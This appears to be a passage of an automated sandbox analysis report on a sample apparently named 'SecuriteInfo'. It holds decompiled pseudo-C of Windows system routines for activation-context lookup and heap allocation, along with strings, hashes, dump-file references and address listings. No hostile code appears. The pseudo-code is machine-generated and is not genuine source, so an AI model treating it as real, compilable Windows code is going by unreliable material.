                                                    • SsHd, xrefs: 1D7AA304
                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D7F77DD, 1D7F7802
                                                    • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1D7F78F3
                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D7F77E2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                    • API String ID: 0-1988757188
                                                    • Opcode ID: bb6ffaaf8c504890e0d56d26f47c15a1c260cb1137a7feb1c793dd7bf0a30039
                                                    • Instruction ID: 990ba564c12bdadeafce53d4e461eca3d018a43026e3fd95987f5fdc73479a37
                                                    • Opcode Fuzzy Hash: bb6ffaaf8c504890e0d56d26f47c15a1c260cb1137a7feb1c793dd7bf0a30039
                                                    • Instruction Fuzzy Hash: 11E1BE70A083428FD715DE28C894B6BB7E1BB85634F194B2EF8A5CB290D731D845CB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7AD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E1D7AD690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x1d88b370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return E1D7D4B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E1D81EF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E1D7AD580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E1D81EF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E1D7AA600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E1D7E8050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E1D7E8050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x1d8891e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E1D794428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E1D7D8170( &_v36, _t228 + _t254, _t211, 0x1c, E1D78B600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}




























































                                                    0x1d7ad698
                                                    0x1d7ad6a2
                                                    0x1d7ad6a6
                                                    0x1d7ad6ad
                                                    0x1d7ad6b1
                                                    0x1d7ad6b4
                                                    0x1d7ad6b8
                                                    0x1d7ad6c3
                                                    0x1d7ad6c7
                                                    0x1d7ad6cb
                                                    0x1d7ad90e
                                                    0x00000000
                                                    0x1d7f913f
                                                    0x1d7f913f
                                                    0x1d7ad847
                                                    0x1d7ad84b
                                                    0x1d7ad84c
                                                    0x1d7ad84d
                                                    0x1d7ad858
                                                    0x1d7ad858
                                                    0x1d7ad90e
                                                    0x1d7ad6d1
                                                    0x1d7ad6d1
                                                    0x1d7ad6db
                                                    0x1d7f9164
                                                    0x1d7f9164
                                                    0x00000000
                                                    0x1d7f9164
                                                    0x1d7ad6e1
                                                    0x1d7ad6ea
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ad6f3
                                                    0x1d7ad8fc
                                                    0x1d7ad701
                                                    0x1d7ad704
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ad70a
                                                    0x1d7ad70d
                                                    0x1d7ad922
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f9149
                                                    0x1d7f914e
                                                    0x1d7f9153
                                                    0x1d7f9158
                                                    0x1d7f9158
                                                    0x1d7f915a
                                                    0x1d7f915c
                                                    0x1d7f9161
                                                    0x00000000
                                                    0x1d7f9161
                                                    0x1d7ad713
                                                    0x1d7ad716
                                                    0x1d7ad936
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f916e
                                                    0x1d7f9173
                                                    0x1d7f9178
                                                    0x00000000
                                                    0x1d7f9178
                                                    0x1d7ad71c
                                                    0x1d7ad71f
                                                    0x1d7ad723
                                                    0x1d7ad72f
                                                    0x1d7ad73c
                                                    0x1d7ad745
                                                    0x1d7ad749
                                                    0x1d7ad751
                                                    0x1d7ad759
                                                    0x1d7ad768
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ad76e
                                                    0x1d7ad772
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ad778
                                                    0x1d7ad77f
                                                    0x1d7ad8f1
                                                    0x1d7ad8f1
                                                    0x1d7f9370
                                                    0x1d7f9370
                                                    0x1d7f937b
                                                    0x1d7f9380
                                                    0x1d7f9383
                                                    0x00000000
                                                    0x1d7f9383
                                                    0x1d7ad785
                                                    0x1d7ad790
                                                    0x1d7ad790
                                                    0x1d7ad790
                                                    0x1d7ad79a
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ad7a0
                                                    0x1d7ad7a3
                                                    0x1d7ad7a7
                                                    0x1d7ad80d
                                                    0x1d7ad80d
                                                    0x1d7ad816
                                                    0x1d7ad81c
                                                    0x1d7ad820
                                                    0x1d7ad822
                                                    0x1d7ad826
                                                    0x1d7ad829
                                                    0x00000000
                                                    0x1d7ad830
                                                    0x1d7ad833
                                                    0x1d7ad85d
                                                    0x1d7ad860
                                                    0x1d7f92e0
                                                    0x1d7f92e8
                                                    0x1d7ad941
                                                    0x1d7ad941
                                                    0x1d7ad949
                                                    0x1d7ad94f
                                                    0x1d7ad874
                                                    0x1d7ad874
                                                    0x1d7ad87a
                                                    0x1d7ad884
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ad886
                                                    0x1d7ad88b
                                                    0x1d7ad83e
                                                    0x1d7ad840
                                                    0x1d7ad891
                                                    0x1d7ad8a5
                                                    0x1d7ad8ac
                                                    0x1d7f933a
                                                    0x1d7ad8dc
                                                    0x1d7ad8de
                                                    0x1d7f935b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f9361
                                                    0x1d7ad8e4
                                                    0x1d7ad8eb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f9349
                                                    0x1d7f9349
                                                    0x1d7f934d
                                                    0x00000000
                                                    0x1d7f934d
                                                    0x1d7f933a
                                                    0x1d7ad8b2
                                                    0x1d7ad8d2
                                                    0x1d7ad8d6
                                                    0x1d7ad8d8
                                                    0x1d7ad8da
                                                    0x00000000
                                                    0x1d7ad8da
                                                    0x1d7ad842
                                                    0x1d7ad842
                                                    0x00000000
                                                    0x1d7ad842
                                                    0x1d7ad955
                                                    0x1d7ad95a
                                                    0x00000000
                                                    0x1d7ad95a
                                                    0x1d7f92ee
                                                    0x1d7f92f2
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f92f8
                                                    0x1d7f92fb
                                                    0x1d7f9301
                                                    0x1d7f931f
                                                    0x1d7f9321
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f9327
                                                    0x1d7f9327
                                                    0x1d7f932c
                                                    0x00000000
                                                    0x1d7f932c
                                                    0x1d7f9306
                                                    0x1d7f9313
                                                    0x1d7f931c
                                                    0x00000000
                                                    0x1d7f931c
                                                    0x1d7f9315
                                                    0x00000000
                                                    0x1d7f9315
                                                    0x1d7f9308
                                                    0x00000000
                                                    0x1d7f9308
                                                    0x1d7ad866
                                                    0x1d7ad869
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ad872
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ad872
                                                    0x1d7ad835
                                                    0x1d7ad838
                                                    0x1d7f9366
                                                    0x00000000
                                                    0x1d7f9366
                                                    0x00000000
                                                    0x1d7ad838
                                                    0x1d7ad830
                                                    0x1d7ad7ad
                                                    0x1d7f917f
                                                    0x1d7f917f
                                                    0x1d7ad7b3
                                                    0x1d7ad7b8
                                                    0x1d7f9188
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f9194
                                                    0x1d7f91a5
                                                    0x1d7f91ac
                                                    0x1d7f91ae
                                                    0x1d7f91b0
                                                    0x1d7f91b7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f91bd
                                                    0x1d7f91bd
                                                    0x1d7f91c8
                                                    0x1d7f91ca
                                                    0x1d7f91d7
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f91e5
                                                    0x1d7f91e6
                                                    0x1d7f91ec
                                                    0x1d7f91f0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f91f2
                                                    0x1d7ad7be
                                                    0x1d7ad7be
                                                    0x1d7ad7c2
                                                    0x1d7ad7c5
                                                    0x1d7f91f7
                                                    0x1d7f91fa
                                                    0x1d7f91fe
                                                    0x1d7f9213
                                                    0x1d7f9216
                                                    0x1d7f921a
                                                    0x1d7f921d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f921f
                                                    0x1d7f9224
                                                    0x1d7ad805
                                                    0x1d7ad807
                                                    0x1d7f9231
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f9237
                                                    0x1d7f923d
                                                    0x1d7f9244
                                                    0x1d7f924e
                                                    0x1d7f9254
                                                    0x1d7f925c
                                                    0x1d7f9261
                                                    0x1d7f9261
                                                    0x1d7f925c
                                                    0x1d7f926d
                                                    0x1d7f926f
                                                    0x1d7f9274
                                                    0x1d7f9286
                                                    0x1d7f9299
                                                    0x1d7f929f
                                                    0x1d7f92a1
                                                    0x1d7f92aa
                                                    0x1d7f92ae
                                                    0x1d7f92b0
                                                    0x1d7f92b0
                                                    0x1d7f92ae
                                                    0x1d7f9274
                                                    0x1d7f92b6
                                                    0x1d7f92d9
                                                    0x1d7f92d9
                                                    0x00000000
                                                    0x1d7f92b6
                                                    0x00000000
                                                    0x1d7ad807
                                                    0x1d7ad7cb
                                                    0x1d7ad7d9
                                                    0x1d7ad7e0
                                                    0x1d7ad7e7
                                                    0x1d7ad7ee
                                                    0x1d7ad7fb
                                                    0x1d7ad800
                                                    0x1d7ad803
                                                    0x1d7ad803
                                                    0x00000000
                                                    0x1d7ad7b8
                                                    0x00000000
                                                    0x1d7ad790
                                                    0x00000000
                                                    0x1d7ad902
                                                    0x1d7ad6fb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D7F9178
                                                    • Actx , xrefs: 1D7F9315
                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D7F914E, 1D7F9173
                                                    • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1D7F9372
                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D7F9153
                                                    • GsHd, xrefs: 1D7AD794
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                    • API String ID: 3446177414-2196497285
                                                    • Opcode ID: c5a629892b8a3fe224e18f1d056391ec394d9422d73c836ae9733dd574625a42
                                                    • Instruction ID: 23ab8a493f07c0353d696aa7df2a6af0c1e72300b9350d546f20bbd1cd60b77d
                                                    • Opcode Fuzzy Hash: c5a629892b8a3fe224e18f1d056391ec394d9422d73c836ae9733dd574625a42
                                                    • Instruction Fuzzy Hash: 21E1B570604342DFD711CF18C884B6AB7E5BF88724F084A6EE9A58B391E771E945CB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D83F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 62%
                                                    			E1D83F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x1d86d320);
				E1D7E7BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E1D787662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E1D83F3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E1D78B910();
						} else {
							E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E1D78B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E1D79FED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E1D840835(_t188, 0);
						_t184 = E1D7A5D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E1D840D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E1D84D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E1D7C3AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E1D7BFDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E1D840835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x1d8847c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x1d8847c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x1d8847c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E1D78B910();
								} else {
									E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E1D83823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E1D78B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E1D78B910();
								} else {
									E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E1D78B910("Just allocated block at %p for %Ix bytes\n",  *0x1d8847c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x1d8847a1 = 1;
									 *0x1d884100 = 0;
									asm("int3");
									 *0x1d8847a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x1d883748; // 0x0
					 *0x1d8891e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

























                                                    0x1d83f0a5
                                                    0x1d83f0a7
                                                    0x1d83f0ac
                                                    0x1d83f0b3
                                                    0x1d83f0b5
                                                    0x1d83f0ba
                                                    0x1d83f0bd
                                                    0x1d83f0c7
                                                    0x1d83f0e3
                                                    0x1d83f0e6
                                                    0x1d83f0f4
                                                    0x1d83f0f9
                                                    0x1d83f0fb
                                                    0x1d83f3d2
                                                    0x1d83f3d2
                                                    0x1d83f3d5
                                                    0x1d83f3d5
                                                    0x1d83f3d8
                                                    0x1d83f3df
                                                    0x1d83f3e4
                                                    0x00000000
                                                    0x1d83f3e4
                                                    0x1d83f104
                                                    0x1d83f106
                                                    0x1d83f10b
                                                    0x1d83f111
                                                    0x1d83f114
                                                    0x1d83f117
                                                    0x1d83f119
